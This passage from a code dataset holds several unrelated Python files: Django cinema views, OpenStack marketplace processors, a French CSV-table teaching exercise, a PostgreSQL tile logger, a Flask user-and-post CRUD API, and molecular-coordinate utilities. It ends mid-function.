functionality:\nsys.stdin.close()\nsys.stdout.close()\nsys.stdin = backup_stdin\nsys.stdout = backup_stdout\n\n#The testing function library:\nimport testing_functions as tf\n#Configuration parameters:\nimport settings\n\ntester = tf.TestClass(settings.course_id,settings.course_repo_name,\n stored_results_file=settings.stored_results_file,\n no_upload_file=settings.upload_sentinel)\n\ndef test_name_input():\n output_name = None\n if hasattr(proj_input,'name'):\n output_name = proj_input.name\n tester.run_comparison(output_name,\n name_input,\n 'You are not reading in user input and saving it to the `name` variable correctly.',\n 'Not yet implemented reading a name.')\ndef test_balance_input():\n output_balance = None\n if hasattr(proj_input,'balance'):\n output_balance = proj_input.balance\n tester.run_comparison(output_balance,\n balance_input,\n 'You are not reading in user input and saving it to the `balance` variable correctly.',\n 'Not yet implemented reading the balance.')\n\n","repo_name":"zeroonetraining/Python_Foundations_I","sub_path":"tests/test_input.py","file_name":"test_input.py","file_ext":"py","file_size_in_byte":1888,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"15164580340","text":"from django.views.generic import ListView, DetailView, TemplateView\nfrom django.contrib.auth.forms import UserCreationForm, AuthenticationForm\nfrom django.http import HttpResponseRedirect, Http404\nfrom django.shortcuts import render\nfrom django.views.generic.base import View\nfrom django.views.generic.edit import FormView\nfrom django.contrib.auth import login, logout\nfrom cinema.models import Movie\nfrom account.models import Profile\nfrom django.http import JsonResponse\n\n\nclass MovieDetail(DetailView):\n template_name = 'cinema/movie_detail.html'\n model = Movie\n\n def get_context_data(self, *args, **kwargs):\n # Call the base implementation first to get a context\n context = super(MovieDetail, self).get_context_data(**kwargs)\n #get profile user data from account.models\n context['profile'] = Profile.objects.get(user=self.request.user.pk)\n return context\n\nclass MovieSearch(View):\n def post(self, request, *args, **kwargs):\n search_text = request.POST['search_text']\n json_result = []\n if search_text is not 
None and search_text != u\"\":\n results = Movie.objects.filter(title__contains=search_text)\n else:\n results = []\n\n for movie in results:\n json_result.append({\n \"title\": movie.title,\n \"url\": movie.get_absolute_url(),\n })\n return JsonResponse({\"result\": json_result})\n\nclass LoginPage(FormView):\n form_class = AuthenticationForm\n # If successful, redirect to home.\n success_url = \"/\"\n\n def dispatch(self, request, *args, **kwargs):\n # if user is authenticated than we need to display a main page with movies\n if request.user.is_authenticated:\n self.template_name = \"cinema/movies_list.html\"\n # if not, display login page instead\n else:\n self.template_name = \"cinema/login-form.html\"\n return super(LoginPage, self).dispatch(request, *args, **kwargs)\n\n def get_context_data(self, **kwargs):\n context = super(LoginPage, self).get_context_data(**kwargs)\n if self.request.user.is_authenticated:\n #get profile user data from account.models\n context['profile'] = Profile.objects.get(user=self.request.user.pk)\n # get all Movies from database without filtration\n context['object_list'] = Movie.objects.all()\n else:\n # Call the base implementation first to get a context\n context['form'].fields['username'].label = \"\"\n context['form'].fields['username'].widget.attrs[\"placeholder\"] = \"username\"\n\n context['form'].fields['password'].label = \"\"\n context['form'].fields['password'].widget.attrs[\"placeholder\"] = \"password\"\n # get all Movies from database without filtration\n context['object_list'] = Movie.objects.all()\n return context\n\n def form_valid(self, form):\n # raise an error if user already authenticated\n if not self.request.user.is_authenticated:\n # We receive object of the user on the basis of the data entered into the form.\n self.user = form.get_user()\n # We perform user authentication.\n login(self.request, self.user)\n else:\n raise Http404\n return super(LoginPage, self).form_valid(form)\n\nclass LogoutView(View):\n def get(self, request):\n logout(request)\n return HttpResponseRedirect(\"/\")\n","repo_name":"Oleg-Pasternak/DjangoCinemaProject","sub_path":"cinema/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"13806528386","text":"from django.core.exceptions import ObjectDoesNotExist\nfrom rest_framework import serializers\nfrom rest_framework.reverse import reverse\n\nfrom waldur_mastermind.marketplace import processors, signals\nfrom waldur_mastermind.packages import models as package_models\nfrom waldur_mastermind.packages import views as package_views\nfrom waldur_openstack.openstack import models as openstack_models\nfrom waldur_openstack.openstack import views as openstack_views\nfrom waldur_openstack.openstack_tenant import views as tenant_views\n\nfrom . import utils\n\n\nclass TenantCreateProcessor(processors.CreateResourceProcessor):\n def get_serializer_class(self):\n return package_views.OpenStackPackageViewSet.create_serializer_class\n\n def get_viewset(self):\n return package_views.OpenStackPackageViewSet\n\n def get_post_data(self):\n order_item = self.order_item\n\n try:\n template = order_item.plan.scope\n except ObjectDoesNotExist:\n template = None\n except AttributeError:\n template = None\n\n if not isinstance(template, package_models.PackageTemplate):\n raise serializers.ValidationError('Plan has invalid scope. 
VPC package template is expected.')\n\n        project = order_item.order.project\n\n        project_url = reverse('project-detail', kwargs={'uuid': project.uuid.hex})\n        spl_url = processors.get_spl_url(openstack_models.OpenStackServiceProjectLink, order_item)\n\n        fields = (\n            'name',\n            'description',\n            'user_username',\n            'user_password',\n            'subnet_cidr',\n            'skip_connection_extnet',\n            'availability_zone',\n        )\n\n        quotas = utils.map_limits_to_quotas(order_item.limits)\n\n        return dict(\n            project=project_url,\n            service_project_link=spl_url,\n            template=template.uuid.hex,\n            quotas=quotas,\n            **processors.copy_attributes(fields, order_item)\n        )\n\n    def get_scope_from_response(self, response):\n        return package_models.OpenStackPackage.objects.get(uuid=response.data['uuid']).tenant\n\n\nclass TenantUpdateProcessor(processors.UpdateResourceProcessor):\n\n    def get_serializer_class(self):\n        return package_views.OpenStackPackageViewSet.change_serializer_class\n\n    def get_view(self):\n        return package_views.OpenStackPackageViewSet.as_view({'post': 'change'})\n\n    def get_post_data(self):\n        resource = self.get_resource()\n        try:\n            package = package_models.OpenStackPackage.objects.get(tenant=resource)\n        except ObjectDoesNotExist:\n            raise serializers.ValidationError('OpenStack package for tenant does not exist.')\n\n        template = self.order_item.plan.scope\n\n        return {\n            'package': package.uuid.hex,\n            'template': template.uuid.hex,\n        }\n\n    def update_limits_process(self, user):\n        scope = self.order_item.resource.scope\n        if not scope or not isinstance(scope, openstack_models.Tenant):\n            signals.limit_update_failed.send(\n                sender=self.order_item.resource.__class__,\n                order_item=self.order_item,\n                message='Limit updating is available only for tenants.'\n            )\n            return\n\n        utils.update_limits(self.order_item)\n\n\nclass TenantDeleteProcessor(processors.DeleteResourceProcessor):\n    viewset = openstack_views.TenantViewSet\n\n\nclass InstanceCreateProcessor(processors.BaseCreateResourceProcessor):\n    viewset = tenant_views.InstanceViewSet\n\n    fields = (\n        'name',\n        'description',\n        'flavor',\n        'image',\n        'security_groups',\n        'internal_ips_set',\n        'floating_ips',\n        'system_volume_size',\n        'system_volume_type',\n        'data_volume_size',\n        'data_volume_type',\n        'volumes',\n        'ssh_public_key',\n        'user_data',\n        'availability_zone',\n    )\n\n\nclass InstanceDeleteProcessor(processors.DeleteResourceProcessor):\n    viewset = tenant_views.InstanceViewSet\n\n\nclass VolumeCreateProcessor(processors.BaseCreateResourceProcessor):\n    viewset = tenant_views.VolumeViewSet\n\n    fields = (\n        'name',\n        'description',\n        'image',\n        'size',\n        'availability_zone',\n        'type',\n    )\n\n\nclass VolumeDeleteProcessor(processors.DeleteResourceProcessor):\n    viewset = tenant_views.VolumeViewSet\n","repo_name":"vasim-rana/waldur-mastermind","sub_path":"src/waldur_mastermind/marketplace_openstack/processors.py","file_name":"processors.py","file_ext":"py","file_size_in_byte":4420,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"48"}
{"seq_id":"6120579616","text":"\"\"\"\r\n    Author : Joël Dendaletche\r\n\r\n    Formatted display of a data table in CSV format :\r\n    Comma Separated Values\r\n    https://fr.wikipedia.org/wiki/Comma-separated_values\r\n\r\n    used to exchange data between programs :\r\n    gmail address book\r\n    excel, libre office calc\r\n    \r\n    Exercises : http://jodenda.free.fr/programmeNSI/cours/\r\n    traitementDonneesEnTables.html\r\n    \r\n    Suggested solution for exercise 5 : queries and how to\r\n    answer them using the tables\r\n\"\"\"\r\nfrom exo3 import lireCSV # reading function that builds the \r\n# list of dictionaries\r\n\r\n# display functions\r\nfrom exo4 import printTableformatee, printTableformateeDeco \r\n\r\n########################################################################\r\ndef printTitre( texte ) :\r\n    l = len(texte)\r\n    print(\" \" * 10 + \"╔\"+ \"═\" * (l+4) + \"╗\")\r\n    print(\" \" * 10 + \"║ \",texte,\"║\")\r\n    print(\" \" * 10 + \"╚\"+ \"═\" * (l+4) + \"╝\") \r\n    
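\r\n########################################################################\r\n# Example of what printTitre produces (illustration added here, it is\r\n# not part of the original exercise file) :\r\n#     printTitre(\"Menu\") prints \"Menu\" framed in a ╔══╗ / ╚══╝ box,\r\n#     indented ten spaces from the left margin.\r\n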
\r\n########################################################################\r\n# exo5 1 : count the records whose postal code is \r\n# below codePostal\r\n########################################################################  \r\ndef exo5_1 (table) :\r\n    printTitre(\"Exercise 5.1 : statistics on the postal code\")\r\n    \r\n    codePostal = \"\"\r\n    while codePostal == \"\" :\r\n        try : # try what follows\r\n            codePostal = int(input(\"Enter a 5-digit postal code number :\"))\r\n\r\n            print (\"\\n\\n\\nQuery : looking for the people who live \",\r\n                   \"in a department whose postal code is \",\r\n                   \"below \", str(codePostal) )\r\n\r\n        except : # runs if the attempt raised an error\r\n            print(\"Please enter a valid postal code number\")\r\n    reponse = [] # initialise the list of expected answers\r\n    ####################################################################  \r\n    for enregistrement in table :\r\n        if int(enregistrement[\"code Postal\"]) < codePostal :\r\n            reponse.append(enregistrement)\r\n    ####################################################################  \r\n    nRep = len (reponse) # number of answers\r\n    if nRep == 0 :\r\n        print(\"There is no record matching the \",\r\n              \"query\")\r\n    else :\r\n        print (\"There are \" + str(nRep) + \" answers : \")\r\n        \r\n    printTableformateeDeco (reponse)\r\n########################################################################\r\n# exo5 2 : count the cards or records whose file \r\n# number is greater than or equal to numDossier\r\n########################################################################  \r\ndef exo5_2 (table) :\r\n    printTitre(\"Exercise 5.2 : statistics on the file number\")\r\n    \r\n    numDossier = 0\r\n    while numDossier <= 0 or numDossier > 9999 :\r\n        try : # try what follows\r\n            numDossier = int(input(\"Enter a 4-digit file number :\"))\r\n\r\n        except : # runs if the attempt raised an error\r\n            print(\"Please enter a 4-digit number !\")\r\n    \r\n    \r\n    print(\"Query : percentage of records whose file \",\r\n          \"number is greater than or equal to \", numDossier)\r\n    reponse = [] # initialise the list of expected answers\r\n    ####################################################################  \r\n    for enregistrement in table :\r\n        if int(enregistrement[\"Dossier num\"]) >= numDossier :\r\n            reponse.append(enregistrement)\r\n    ####################################################################  \r\n    nRep = len (reponse) # number of answers\r\n    if nRep == 0 :\r\n        print(\"There is no record matching the \",\r\n              \"query\")\r\n    else :\r\n        print(\"There are \", nRep / len(table) * 100, \"% of the records\",\r\n              \" matching the query.\")\r\n    printTitre(\"Table of the cards whose file number is greater \"+\r\n\t\t\t\t\"than or equal to \"+ str( numDossier))\r\n    printTableformateeDeco (reponse)\r\n
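########################################################################\r\n# Note added for illustration (not in the original file) : each filter\r\n# loop above is equivalent to a list comprehension over the table, e.g.\r\n# for exo5_1 :\r\n#     reponse = [e for e in table if int(e[\"code Postal\"]) < codePostal]\r\n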
########################################################################\r\n# exo5 3 : percentage of records whose name starts with lettre\r\n########################################################################  \r\nalphabet = ['a','b','c','d','e','f','g','h','i','j','k','l','m', 'n',\r\n\t\t\t'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z']\r\ndef exo5_3 (table) :\r\n    texte =\" Exercise 5.3 : percentage of records whose name starts with a letter of your choice :\"\r\n    printTitre(texte)\r\n    \r\n    lettre = \"\"\r\n    while lettre.lower() not in alphabet :\r\n        try : # try what follows\r\n            lettre = input(\"Enter a letter of the alphabet :\")\r\n\r\n        except : # runs if the attempt raised an error\r\n            print(\"Enter a single letter of the alphabet !\")\r\n    \r\n    \r\n    print(\"Query : percentage of records whose name \",\r\n          \"starts with \", lettre)\r\n    reponse = [] # initialise the list of expected answers\r\n    ####################################################################  \r\n    for enregistrement in table :\r\n        if enregistrement[\"Nom\"][0].lower() == lettre :\r\n            reponse.append(enregistrement)\r\n    ####################################################################  \r\n    nRep = len (reponse) # number of answers\r\n    if nRep == 0 :\r\n        print(\"There is no record matching the \",\r\n              \"query\")\r\n    else :\r\n        print(\"There are \", nRep / len(table) * 100, \"% of the records\",\r\n              \" matching the query.\")\r\n        printTitre(\"Table of the cards whose name starts with \"+ lettre)\r\n    \r\n    printTableformateeDeco (reponse)\r\n########################################################################  \r\ndef viderEcran () :\r\n    import os\r\n    #os.system('cls') # clears the cmd.exe console screen on windows\r\n    os.system('clear') # on linux / os x\r\n    \r\n    print(\"The BDD.csv file is read and converted into a list of \",\r\n          \"dictionaries\")\r\n\r\n########################################################################\r\n# the following code is test code :\r\n########################################################################  \r\ndef main() : \r\n    \"\"\"\r\n    Test function for lireCSV\r\n    \"\"\"\r\n    print(\"Clear the screen : \"+ 57 * \"\\n\")\r\n    print(\"___________________________________________________________\",\r\n          \"____\")\r\n    \r\n    table = lireCSV(\"BDD.csv\")\r\n    # test of the second decorative display function\r\n    printTableformateeDeco (table)\r\n    print(\"\\nThe table contains \", len(table), \r\n          \"rows, i.e. cards or records.\")\r\n\r\n    printTitre(\"Choose the exercise to test\")\r\n    for i in range(1,4) :\r\n        print(\"- exercise no. 5.\", i)\r\n    n = int(input(\"number :\"))\r\n    \r\n    if n == 1 : exo5_1 (table)\r\n    elif n == 2 : exo5_2 (table)\r\n    elif n == 3 : exo5_3 (table)\r\n    else : print(\"Too bad, you cannot read !\")\r\n\r\nif __name__ == \"__main__\":\r\n    \"\"\"\r\n    Only runs if this file is the one executed directly.\r\n    The variable __name__ takes the value of the file that was run first.\r\n    \"\"\"\r\n    main()\r\n\r\n\r\n\r\n","repo_name":"NsiLycee/premiere","sub_path":"programmeNSI/cours/exo/exo5.py","file_name":"exo5.py","file_ext":"py","file_size_in_byte":7560,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"10365824707","text":"import logging\nimport sys\nimport time\n\nimport psycopg2.sql\nfrom prometheus_client import Summary\n\nimport 
tilecloud_chain.configuration\nfrom tilecloud import Tile\n\n_LOGGER = logging.getLogger(__name__)\n\n_INSERT_SUMMARY = Summary(\"tilecloud_chain_database_logger\", \"Number of database inserts\", [\"layer\"])\n\n\nclass DatabaseLoggerCommon:\n \"\"\"Log the generated tiles in a database.\"\"\"\n\n def __init__(self, config: tilecloud_chain.configuration.Logging, daemon: bool):\n db_params = config[\"database\"]\n while True:\n try:\n self.connection = psycopg2.connect(\n dbname=db_params[\"dbname\"],\n host=db_params.get(\"host\"),\n port=db_params.get(\"port\"),\n user=db_params.get(\"user\"),\n password=db_params.get(\"password\"),\n )\n break\n except psycopg2.OperationalError:\n _LOGGER.warning(\"Failed connecting to the database. Will try again in 1s\", exc_info=True)\n if daemon:\n time.sleep(1)\n else:\n sys.exit(2)\n if \".\" in db_params[\"table\"]:\n schema, table = db_params[\"table\"].split(\".\")\n else:\n schema = \"public\"\n table = db_params[\"table\"]\n\n with self.connection.cursor() as cursor:\n cursor.execute(\n \"SELECT EXISTS(SELECT 1 FROM pg_tables WHERE schemaname=%s AND tablename=%s)\", (schema, table)\n )\n schema = psycopg2.extensions.quote_ident(schema, self.connection)\n table = psycopg2.extensions.quote_ident(table, self.connection)\n\n if not cursor.fetchone()[0]:\n try:\n cursor.execute(\n psycopg2.sql.SQL(\n \"CREATE TABLE {}.{} (\"\n \" id BIGSERIAL PRIMARY KEY,\"\n \" layer CHARACTER VARYING(80) NOT NULL,\"\n \" run INTEGER NOT NULL,\"\n \" action CHARACTER VARYING(7) NOT NULL,\"\n \" tile TEXT NOT NULL,\"\n \" UNIQUE (layer, run, tile))\"\n ).format(psycopg2.sql.Identifier(schema), psycopg2.sql.Identifier(table))\n )\n self.connection.commit()\n except psycopg2.DatabaseError:\n logging.exception(\"Unable to create table %s.%s\", schema, table)\n sys.exit(1)\n else:\n try:\n cursor.execute(\n psycopg2.sql.SQL(\n \"INSERT INTO {}.{}(layer, run, action, tile) VALUES (%s, %s, %s, %s)\"\n ).format(psycopg2.sql.Identifier(schema), psycopg2.sql.Identifier(table)),\n (\"test_layer\", -1, \"test\", \"-1x-1\"),\n )\n except psycopg2.DatabaseError:\n logging.exception(\"Unable to insert logging data into %s.%s\", schema, table)\n sys.exit(1)\n finally:\n self.connection.rollback()\n\n self.schema = schema\n self.table = table\n\n\nclass DatabaseLoggerInit(DatabaseLoggerCommon):\n \"\"\"Log the generated tiles in a database.\"\"\"\n\n def __init__(self, config: tilecloud_chain.configuration.Logging, daemon: bool) -> None:\n super().__init__(config, daemon)\n\n with self.connection.cursor() as cursor:\n cursor.execute(\n psycopg2.sql.SQL(\"SELECT COALESCE(MAX(run), 0) + 1 FROM {}.{}\").format(\n psycopg2.sql.Identifier(self.schema), psycopg2.sql.Identifier(self.table)\n )\n )\n (self.run,) = cursor.fetchone()\n\n def __call__(self, tile: Tile) -> Tile:\n tile.metadata[\"run\"] = self.run\n return tile\n\n\nclass DatabaseLogger(DatabaseLoggerCommon):\n \"\"\"Log the generated tiles in a database.\"\"\"\n\n def __call__(self, tile: Tile) -> Tile:\n if tile is None:\n _LOGGER.warning(\"The tile is None\")\n return None\n\n if tile.error:\n action = \"error\"\n elif tile.data:\n action = \"create\"\n else:\n action = \"delete\"\n\n layer = tile.metadata.get(\"layer\", \"- No layer -\")\n run = tile.metadata.get(\"run\", -1)\n\n with _INSERT_SUMMARY.labels(layer).time():\n with self.connection.cursor() as cursor:\n try:\n cursor.execute(\n psycopg2.sql.SQL(\n \"INSERT INTO {} (layer, run, action, tile) \"\n \"VALUES (%(layer)s, %(run)s, %(action)s::varchar(7), 
%(tile)s)\"\n                    ).format(psycopg2.sql.Identifier(self.schema), psycopg2.sql.Identifier(self.table)),\n                    {\"layer\": layer, \"action\": action, \"tile\": str(tile.tilecoord), \"run\": run},\n                )\n            except psycopg2.IntegrityError:\n                self.connection.rollback()\n                cursor.execute(\n                    psycopg2.sql.SQL(\n                        \"UPDATE {} SET action = %(action)s \"\n                        \"WHERE layer = %(layer)s AND run = %(run)s AND tile = %(tile)s\"\n                    ).format(psycopg2.sql.Identifier(self.schema), psycopg2.sql.Identifier(self.table)),\n                    {\"layer\": layer, \"action\": action, \"tile\": str(tile.tilecoord), \"run\": run},\n                )\n\n            self.connection.commit()\n\n        return tile\n","repo_name":"camptocamp/tilecloud-chain","sub_path":"tilecloud_chain/database_logger.py","file_name":"database_logger.py","file_ext":"py","file_size_in_byte":5666,"program_lang":"python","lang":"en","doc_type":"code","stars":44,"dataset":"github-code","pt":"48"}
{"seq_id":"40318111217","text":"from flask import Flask, json, request, jsonify\nfrom flask_cors import CORS\nfrom Crud_Usuarios import Crud_Users\nfrom Crud_publicaciones import Crud_posts\n\ncrud_usuarios = Crud_Users()\ncrud_publiciones = Crud_posts()\napp = Flask(__name__)\nCORS(app)\n\n# Insert a new user\n@app.route('/usuario', methods=[\"PUT\"])\ndef insertarUsuario():\n    email = request.json[\"email\"]\n    pwd = request.json[\"password\"]\n    name = request.json[\"name\"]\n    gener = request.json[\"gener\"]\n    username = request.json[\"username\"]\n\n    resultado = crud_usuarios.Crear_User(email, pwd, name, gener, username)\n    return jsonify({\"data\": resultado, \"mensaje\": \"OK\"}), 200\n
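\n# Example call for the route above (illustrative only; the host and the\n# payload values are assumptions, not taken from this repo):\n#   curl -X PUT http://localhost:4000/usuario -H \"Content-Type: application/json\" -d '{\"email\": \"ana@mail.com\", \"password\": \"x\", \"name\": \"Ana\", \"gener\": \"F\", \"username\": \"ana\"}'\n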
\n# Insert a new post\n@app.route('/post', methods=[\"PUT\"])\ndef insertarpost():\n    tipo = request.json[\"tipo\"]\n    url = request.json[\"url\"]\n    date = request.json[\"date\"]\n    category = request.json[\"category\"]\n    author = request.json[\"author\"]\n\n    resultado = crud_publiciones.Crear_post(tipo, url,date,category,author)\n    return jsonify({\"data\": resultado, \"mensaje\": \"OK\"}), 200\n\n# Login\n@app.route('/Login', methods=[\"POST\"])\ndef Login():\n    email = request.json[\"email\"]\n    password = request.json[\"password\"]\n\n    resultado = crud_usuarios.login(email, password)\n    if resultado:\n        return jsonify({\"data\": resultado, \"mensaje\": \"OK\"}), 200\n    else:\n        return jsonify({\"mensaje\": \"Credenciales incorrectas\"}), 404\n    \n# Fetch all users\n@app.route('/devolver_todo',methods=[\"GET\"])\ndef devolver_usuarios():\n    resultado = crud_usuarios.Read_all_users()\n    return jsonify(resultado),200\n\n# Fetch all posts\n@app.route('/devolver_Posts',methods=[\"GET\"])\ndef devolver_posts():\n    resultado = crud_publiciones.Read_all_posts()\n    return jsonify(resultado),200\n\n# Look up a single user \n@app.route('/buscar_usuario', methods=[\"POST\"])\ndef buscar_un_usuario():\n    email = request.json[\"email\"]\n    resultado = crud_usuarios.Leer_un_usuario(email)\n    return jsonify(resultado), 200\n\n# Look up a single post \n@app.route('/buscar_post', methods=[\"POST\"])\ndef buscar_un_post():\n    id = request.json[\"id\"]\n    resultado = crud_publiciones.Leer_un_post(id)\n    return jsonify(resultado), 200 \n\n# Update a user\n@app.route('/actualizar', methods = [\"POST\"])\ndef metodoactualizar():\n    email = request.json[\"email\"]\n    pwd = request.json[\"password\"]\n    name = request.json[\"name\"]\n    gener = request.json[\"gener\"]\n    username = request.json[\"username\"]\n\n    resultado = crud_usuarios.updateUser(email, pwd, name, gener, username)\n    return jsonify({\"data\": resultado, \"mensaje\": \"OK\"}), 200\n\n\n# Update a post\n@app.route('/actualizarpost', methods = [\"POST\"])\ndef metodoactualizarpost():\n    id = request.json[\"id\"]  \n    tipo = request.json[\"tipo\"]  \n    url = request.json[\"url\"]  \n    date = request.json[\"date\"]  \n    category = request.json[\"category\"]  \n    likes = request.json[\"likes\"]  \n    author = request.json[\"author\"]  \n\n    resultado = crud_publiciones.updatepost(id,tipo, url,date,category,likes,author)\n    return jsonify({\"data\": resultado, \"mensaje\": \"OK\"}), 200\n\n# Update like count\n@app.route('/actualizarlike', methods = [\"POST\"])\ndef metodoactualizarlike():\n    id = request.json[\"id\"]  \n    \n    resultado = crud_publiciones.updatepost(id)\n    return jsonify({\"data\": resultado, \"mensaje\": \"OK\"}), 200\n\n# Delete a user\n@app.route('/eliminar',methods=[\"DELETE\"])\ndef eliminar():\n    email = request.json[\"email\"]\n    resultado = crud_usuarios.eliminarUsuario(email)\n    return jsonify({\"mensaje\":resultado}), 200\n\n# Delete a post\n@app.route('/eliminarpost',methods=[\"DELETE\"])\ndef eliminarpost():\n    id = request.json[\"id\"]\n    resultado = crud_publiciones.eliminarposts(id)\n    return jsonify({\"mensaje\":resultado}), 200\n    \n\n# Bulk-load users\n@app.route('/usuarios/carga-masiva', methods=[\"POST\"])\ndef cargaMasiva():\n    usuarios = request.json[\"usuarios\"]\n    resultado = crud_usuarios.cargaMasiva(usuarios)\n    if resultado == \"OK\":\n        return jsonify({\"data\": crud_usuarios.Read_all_users(), \"mensaje\": \"OK\"}), 200\n    else:\n        return jsonify({\"mensaje\": \"Hubo un error en la carga masiva\"}), 400\n\n# Bulk-load posts\n@app.route('/post/carga-masivai', methods=[\"POST\"])\ndef cargaMasivaposti():\n    images = request.json[\"images\"]\n    resultado = crud_publiciones.cargaMasiva(images)\n    \n\n    if resultado == \"OK\":\n        return jsonify({\"data\": crud_publiciones.Read_all_posts(), \"mensaje\": \"OK images\"}), 200\n    else:\n        return jsonify({\"mensaje\": \"Hubo un error en la carga masiva\"}), 400\n\n@app.route('/post/carga-masivav', methods=[\"POST\"])\ndef cargaMasivapostv():\n    videos = request.json[\"videos\"]\n    resultado = crud_publiciones.cargaMasiva(videos)\n    \n\n    if resultado == \"OK\":\n        return jsonify({\"data\": crud_publiciones.Read_all_posts(), \"mensaje\": \"OK videos\"}), 200\n    else:\n        return jsonify({\"mensaje\": \"Hubo un error en la carga masiva\"}), 400\n# default route\n@app.route('/', methods=[\"GET\"])\ndef Raiz():\n    return jsonify({\"mensaje\":\"Servidor Levantado\"}), 200\n\n\nif __name__ == '__main__':\n    app.run('0.0.0.0', debug=True, port=4000)","repo_name":"Rodolfo-C-Andres/Proyecto2","sub_path":"Backend/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5094,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"2647988822","text":"import mdtraj as md\nimport numpy as np\n\nfrom alias.src.utilities import unit_vector\n\n\ndef molecular_positions(\n        atom_coord,\n        atoms,\n        masses,\n        mode='molecule',\n        com_sites=None):\n    \"\"\"\n    Returns XYZ array of molecular positions from array of atoms\n\n    Parameters\n    ----------\n    atom_coord:  array_like of floats\n        Positions of particles in 3 dimensions\n    atoms:  list of str\n        Names of each atom in molecule\n    masses:  array_like of float\n        Masses of all atomic sites in g mol-1\n    mode: str, optional, default: 'molecule'\n        Mode of calculation, either 'molecule' or 'sites':\n        if `molecule`, molecular centre of mass is used.\n        Otherwise, if 'sites', only atoms with corresponding\n        indices given by com_sites are used.\n    com_sites: str or list of 
str, optional\n List of atomic site names to use in center of mass\n calculation\n\n Returns\n -------\n mol_coord: array_like of floats\n Positions of molecules in 3 dimensions\n \"\"\"\n\n # Calculate the expected number of molecules in mol_coord\n n_site = len(atoms)\n n_mol = atom_coord.shape[0] // n_site\n\n # Create an empty array containing molecular coordinates\n mol_coord = np.zeros((n_mol, 3))\n\n assert mode in ['molecule', 'sites'], (\n f\"Argument mode=={mode} must be either 'molecule' or 'sites'\"\n )\n\n # Use centre of mass of molecule as molecular position\n if mode == 'molecule':\n for i in range(3):\n mol_coord[:, i] = np.sum(\n np.reshape(\n atom_coord[:, i] * masses, (n_mol, n_site)\n ), axis=1\n )\n mol_coord[:, i] *= n_mol / masses.sum()\n\n return mol_coord\n\n # Convert integer com_sites input into a list\n if isinstance(com_sites, str):\n com_sites = [com_sites]\n\n assert len(com_sites) < n_site, (\n f\"Argument com_sites must have a length ({len(com_sites)}) \"\n f\"less than n_sites ({n_site})\"\n )\n\n indices = [atoms.index(site) for site in com_sites]\n\n # Use single atom as molecular position\n if len(com_sites) == 1:\n mol_list = np.arange(n_mol) * n_site + int(indices[0])\n for i in range(3):\n mol_coord[:, i] = atom_coord[mol_list, i]\n\n # Use centre of mass of a group of atoms within molecule as\n # molecular position\n elif len(com_sites) > 1:\n mol_list = np.arange(n_mol) * n_site\n mol_list = mol_list.repeat(len(com_sites))\n mol_list += np.tile(indices, n_mol)\n\n for i in range(3):\n mol_coord[:, i] = np.sum(\n np.reshape(\n atom_coord[mol_list, i] * masses[mol_list],\n (n_mol, len(com_sites))\n ), axis=1\n )\n mol_coord[:, i] *= n_mol / masses[mol_list].sum()\n\n return mol_coord\n\n\ndef minimum_image(d_array, pbc_box):\n \"\"\"Mutates d_array to yield the minimum signed value of each\n element, based on periodic boundary conditions given by pbc_box\n Parameters\n ---------\n d_array: array_like of float\n Array of elements in n dimensions, where the last axis\n corresponds to a vector with periodic boundary conditions\n enforced by values in pbc_box\n pbc_box: array_like of floats\n Vector containing maximum signed value for each element\n in d_array\n \"\"\"\n\n assert d_array.shape[-1] == pbc_box.shape[-1]\n\n # Obtain minimum image distances based on rectangular\n # prism geometry\n for i, dim in enumerate(pbc_box):\n d_array[..., i] -= dim * np.rint(\n d_array[..., i] / dim\n )\n\n\ndef coordinate_arrays(traj, atoms, masses, mode='molecule',\n com_sites=None):\n \"\"\"Return arrays of molecular centre of masses for each frame in\n trajectory\"\"\"\n\n atom_traj = traj.xyz * 10\n mol_traj = np.empty((0, traj.n_residues, 3))\n\n for index, atom_coord in enumerate(atom_traj):\n\n mol_coord = molecular_positions(\n atom_coord,\n atoms,\n masses,\n mode=mode,\n com_sites=com_sites\n )\n\n mol_traj = np.concatenate([\n mol_traj, np.expand_dims(mol_coord, 0)])\n\n return mol_traj\n\n\ndef orientation(traj, center_atom, vector_atoms):\n \"\"\"\n Calculates orientational unit vector for lipid models,\n based on vector between phosphorus group\n and carbon backbone.\n \"\"\"\n\n center_indices = [\n atom.index for atom in traj.topology.atoms\n if (atom.name == center_atom)]\n atom_indices = [\n [atom.index for atom in traj.topology.atoms\n if (atom.name == name)]\n for name in vector_atoms\n ]\n\n atom_coord = traj.xyz * 10\n dim = traj.unitcell_lengths * 10\n u_vectors = np.zeros(\n (atom_coord.shape[0], len(center_indices), 3))\n\n for j in 
range(atom_coord.shape[0]):\n\n midpoint = [\n atom_coord[j][index] for index in atom_indices\n ]\n midpoint = sum(midpoint) / len(midpoint)\n\n vector = atom_coord[j][center_indices] - midpoint\n\n for i, l in enumerate(dim[j]):\n vector[:, i] -= l * np.array(\n 2 * vector[:, i] / l, dtype=int)\n\n u_vectors[j] = unit_vector(vector)\n\n return u_vectors\n\n\ndef batch_coordinate_loader(\n trajectory, surface_parameters, topology=None, chunk=500):\n \"\"\"Generates molecular positions and centre of mass for each frame\n\n Parameters\n ----------\n trajectory: str\n Path to trajectory file\n surface_parameters: instance of SurfaceParameters\n Parameters for intrinsic surface\n topology: str, optional\n Path to topology file\n chunk int, optional\n Maximum chunk size for mdtraj batch loading\n \"\"\"\n mol_traj = np.empty((0, surface_parameters.n_mols, 3))\n mol_vec = np.empty((0, surface_parameters.n_mols, 3))\n com_traj = np.empty((0, 3))\n cell_dim = np.zeros((0, 3))\n\n masses = np.repeat(\n surface_parameters.masses, surface_parameters.n_mols)\n\n for index, traj in enumerate(\n md.iterload(trajectory, chunk=chunk, top=topology)):\n\n cell_dim_chunk = traj.unitcell_lengths * 10\n com_chunk = md.compute_center_of_mass(traj) * 10\n\n traj = traj.atom_slice(surface_parameters.atom_indices)\n mol_chunk = coordinate_arrays(\n traj, surface_parameters.atoms, masses,\n mode=surface_parameters.com_mode,\n 